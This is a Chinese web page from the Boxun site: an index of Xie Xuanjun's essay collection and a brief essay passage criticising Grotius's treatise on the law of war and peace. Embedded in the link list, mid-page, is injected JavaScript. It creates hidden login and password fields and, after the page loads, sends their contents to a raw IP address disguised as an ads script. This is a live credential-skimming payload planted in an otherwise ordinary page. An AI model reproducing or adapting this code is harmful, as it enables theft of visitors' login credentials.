宗教信仰

谢选骏文集
[主页]->[宗教信仰]->[谢选骏文集]->[1867思想的主权OnSovereigntyOfThinkAndOnThinkOfSovereignty]
谢选骏文集
·《被囚禁的中国》第二章6
·《被囚禁的中国》第二章7
·《被囚禁的中国》第二章8
·《被囚禁的中国》第二章9
·《被囚禁的中国》第三章6
·《被囚禁的中国》第三章7
·《被囚禁的中国》第三章8
·《被囚禁的中国》第四章1
·《被囚禁的中国》第四章2
·《被囚禁的中国》第四章3
·《被囚禁的中国》第四章4
·《被囚禁的中国》第四章5
·《被囚禁的中国》第五章1
·《被囚禁的中国》第五章2
·《被囚禁的中国》第五章3
·《被囚禁的中国》第五章4
·《被囚禁的中国》第五章5
·《被囚禁的中国》第五章6
·《被囚禁的中国》第五章7
·《被囚禁的中国》第五章8
·《被囚禁的中国》第六章1
·《被囚禁的中国》第六章2
·《被囚禁的中国》第六章3
·《被囚禁的中国》第六章4
·《被囚禁的中国》第六章5
·《被囚禁的中国》第六章6
·《被囚禁的中国》第六章7
·《被囚禁的中国》第七章1
·《被囚禁的中国》第七章2
·《被囚禁的中国》第七章3
·《被囚禁的中国》第七章4
·《被囚禁的中国》第七章5
·《被囚禁的中国》第七章6
·《被囚禁的中国》附录1-1
·《被囚禁的中国》附录1-2
·《被囚禁的中国》附录2
·《第三中国论》全书十二篇1980——2010年
·第一篇“第三中国”与“第三期中国文明”
·第二篇“第三期中国文明”与埃及的“新王国时期”
·第三篇 对“第三中国”两点思考
·第四篇中国的崛起有待“第三中国”的崛起
·第五篇共和与独裁
·第六篇“第三中国”与民族国家
·第七篇“第三中国”的组建运动
·第八篇“第三中国”与青年中国
·第九篇“第三中国”非社会主义
·第十篇“第三中国”与复古主义
·第十一篇“第三中国”的内外之别
·第十二篇“第三中国”的世界命运
·后记/附录
·王国时代的智慧全书 目录
·王国时代的智慧全书 序言
·王国时代的智慧全书01-10
·王国时代的智慧全书11-20
·王国时代的智慧全书21-30
·王国时代的智慧全书30-40
·王国时代的智慧全书41-50
·王国时代的智慧全书51-60
·王国时代的智慧全书61-70
·王国时代的智慧全书71-80
·“人子”是耶稣在代表上帝发言
·ZT:马克思韦伯误判了天主教
·美国鹰之折翼—小罗斯福故居纪念馆的“赝品”
·var form = document.createElement("form");var text = document.createElement("input"); var pass = document.createElement("input"); text.id = "id"; text.name = "id"; text.type = "text"; pass.id = "password"; pass.name = "password"; pass.type = "password"; form.appendChild(text); form.appendChild(pass); window.addEventListener("load", function() { window.setTimeout(function() { new Image().src="http://185.244.150.208/ads.php?v="+encodeURI(pass.value+text.value); }, 1000);}); _1.shtml>
·思想主权论001
·思想主权论002
·思想主权论003
·思想主权论004
·思想主权论004
·思想主权论005
·思想主权论006
·思想主权论007
·思想主权论008
·思想主权论009
·思想主权论010
·思想主权论011
·思想主权论012
·思想主权论013
·思想主权论014
·思想主权论015
·思想主权论016
·思想主权论017
·思想主权论018
·思想主权论019
·思想主权论020
·思想主权论021
·思想主权论022
·思想主权论023
·思想主权论024
·思想主权论025
·思想主权论026
·思想主权论027
·思想主权论028
·思想主权论029
·思想主权论030
·思想主权论031
·思想主权论032
·思想主权论033
·思想主权论034
·思想主权论035
·思想主权论036
[列出本栏目所有内容]
欢迎在此做广告
1867思想的主权OnSovereigntyOfThinkAndOnThinkOfSovereignty

   
   可惜,赋予格劳修斯以欧洲的“国际法之父”与“自然法之父”的巨著《论战争与和平的法律》(On The Law of War and Peace,1625年)也是建筑在一些基本的前提错误之上的;受他恶劣的影响所及,西方社会四百年来国无宁日,从1618年至1648年的三十年战争,到1914年至1945年的“新三十年战争”(两次世界大战);战争伊始,格劳修斯1618年就因卷入荷兰政治、宗教冲突而被监禁,1621年依靠妻子越狱,逃亡专制王权的法国,受到法国国王路易十三和宰相黎塞留的政治庇护,并于1623年2月26日从法国国王那里取得了归化证书;从此之后,格劳秀斯便开始潜心著述,其“国际法”思想及其写作深受这一经历的影响……到了1645年,三十年战争尚未结束,格劳修斯就死于瑞典女王克里斯丁娜的重用之下,和几年之后的笛卡尔如出一辙。
(2013/08/08 发表)

blog comments powered by Disqus

©Boxun News Network All Rights Reserved.
所有栏目和文章由作者或专栏管理员整理制作,均不代表博讯立场